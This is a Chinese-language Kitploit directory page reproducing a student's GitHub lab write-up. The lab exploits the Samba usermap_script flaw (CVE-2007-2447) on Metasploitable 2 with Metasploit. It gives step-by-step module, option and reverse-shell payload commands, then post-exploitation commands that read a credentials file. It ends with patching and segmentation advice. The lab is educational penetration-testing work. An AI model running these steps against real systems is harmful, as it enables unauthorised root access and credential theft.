Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2 — 逐步渗透测试实验,利用 Metasploit 在 Metasploitable 2 上利用 Samba CVE-2007-2447 漏洞,演示 root 权限获取、凭据窃取和数据外泄,用于教育性红队训练。 | Kitploit
工具/GitHubGitHub/devinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2
权限提升漏洞分析漏洞利用数据泄露后渗透利用渗透测试命令与控制学习与教育实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubdevinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

逐步渗透测试实验,利用 Metasploit 在 Metasploitable 2 上利用 Samba CVE-2007-2447 漏洞,演示 root 权限获取、凭据窃取和数据外泄,用于教育性红队训练。

查看仓库
41年前尚未审核

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

RedTeam-SMB-PenTest

linux bash

描述


本项目记录了我在UMGC的CMIT 386课程中进行的渗透测试工作。它重点介绍了如何从Kali Linux攻击虚拟机使用Metasploit,利用Metasploitable 2上的Samba SMB usermap_script漏洞(CVE-2007-2447)。此概念验证展示了旧版漏洞如何导致系统完全受损、凭据窃取和数据外泄。

漏洞概述

该漏洞位于445端口上的Samba服务中,username map脚本对输入的处理不当,允许未经身份验证的远程命令执行。如果被利用,攻击者将获得root级别的shell访问权限。

环境

操作步骤

1. 启动Metasploit:

root@kitploit:~
msfconsole


确保攻击者主机和受害者虚拟机均已启动并运行。

2. 搜索漏洞利用模块:

root@kitploit:~
search samba

3. 使用合适的模块:

root@kitploit:~
use exploit/multi/samba/usermap_script

4. 设置所需选项:

root@kitploit:~
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse

5. 执行漏洞利用:

root@kitploit:~
exploit

6. 后渗透命令:

root@kitploit:~
whoami
hostname
cd /redteam7/student3
cat mypass.txt

重置说明

如果会话挂起或中断:

重置Metasploit:

root@kitploit:~
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K             
jobs -K
# Restart Metasploit
msfconsole              

关键要点

  • 像Samba 3.0.20这样使用usermap_script的旧版服务极易受攻击。
  • 利用此SMB漏洞可获得root shell访问权限。
  • 通过简单命令即可获取关键数据,这展示了真实世界中的风险。
  • 这证明了修补、网络分段和减少服务暴露的必要性。

建议

  • 立即修补或淘汰旧版系统。
  • 实施严格的网络分段和防火墙规则。
  • 仅向内部经过身份验证的用户开放SMB访问。
  • 监控日志以发现可疑活动和横向移动。

参考资料

  • Metasploit Samba usermap_script
  • CVE-2007-2447 漏洞详情
  • Metasploitable 2 漏洞利用索引
下载工具
组件详细信息
攻击者虚拟机Kali Linux
受害者虚拟机Metasploitable 2
目标端口445 (Samba/SMB)
使用的漏洞利用模块exploit/multi/samba/usermap_script
凭据目标/redteam7/student3/mypass.txt